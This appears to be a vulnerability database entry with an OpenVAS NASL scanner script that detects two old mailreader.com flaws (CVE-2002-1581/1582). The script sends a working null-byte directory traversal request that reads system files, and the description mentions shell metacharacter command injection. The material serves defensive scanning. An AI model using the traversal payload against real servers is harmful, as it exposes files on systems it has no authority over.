mailreader.com < 2.3.32 Multiple Vulnerabilities

2005-11-0300:00:00

plugins.openvas.org

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

AI Score

6.5

Confidence

Low

EPSS

0.016

Percentile

87.5%

JSON

mailreader.com is prone to multiple vulnerabilities.

# SPDX-FileCopyrightText: 2005 Michel Arboi
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.11780");
  script_version("2023-06-27T05:05:30+0000");
  script_tag(name:"last_modification", value:"2023-06-27 05:05:30 +0000 (Tue, 27 Jun 2023)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  script_cve_id("CVE-2002-1581", "CVE-2002-1582");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/5393");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/6055");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/6058");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_name("mailreader.com < 2.3.32 Multiple Vulnerabilities");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2005 Michel Arboi");
  script_family("Web application abuses");
  script_dependencies("find_service.nasl", "no404.nasl", "webmirror.nasl", "DDI_Directory_Scanner.nasl", "os_detection.nasl", "global_settings.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_tag(name:"summary", value:"mailreader.com is prone to multiple vulnerabilities.");

  script_tag(name:"insight", value:"The following flaws exist:

  - CVE-2002-1581: Directory traversal vulnerability in nph-mr.cgi allows remote attackers to view
  arbitrary files via .. (dot dot) sequences and a null byte (%00) in the configLanguage parameter.

  - CVE-2002-1582: compose.cgi, when using Sendmail as the Mail Transfer Agent, allows remote
  attackers to execute arbitrary commands via shell metacharacters in the RealEmail configuration
  variable, which is used to call Sendmail in network.cgi.");

  script_tag(name:"solution", value:"Update to version 2.3.32 or later.");

  script_tag(name:"qod_type", value:"remote_banner");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("host_details.inc");
include("os_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
include("list_array_func.inc");
include("misc_func.inc");

port = http_get_port(default: 80);

foreach dir (make_list_unique("/", http_cgi_dirs(port: port))) {

  if (dir == "/")
    dir = "";

  req = http_get(item: dir + "/nph-mr.cgi?do=loginhelp&configLanguage=english", port: port);
  res = http_keepalive_send_recv(port: port, data: req, bodyonly: TRUE);
  if (!res || "Powered by Mailreader.com" >!< res)
    continue;

  files = traversal_files();
  foreach pattern(keys(files)) {

    file = files[pattern];

    url = strcat(dir, "/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../", file, "%00");
    r = http_get(port: port, item: url);
    r2 = http_keepalive_send_recv(port: port, data: r);
    if(!r2)
      continue;

    if (egrep(string: r2, pattern: pattern)) {
      report = http_report_vuln_url(port: port, url: url);
      security_message(data: report, port: port);
      exit(0);
    }
  }

  if (res =~ "Powered by Mailreader\.com v2\.3\.3[01]" || res =~ "Powered by Mailreader\.com v2\.([01]\.*|2\.([0-2]\..*|3\.([0-9][^0-9]|[12][0-9])))") {
    security_message(port: port);
    exit(0);
  }
}

exit(99);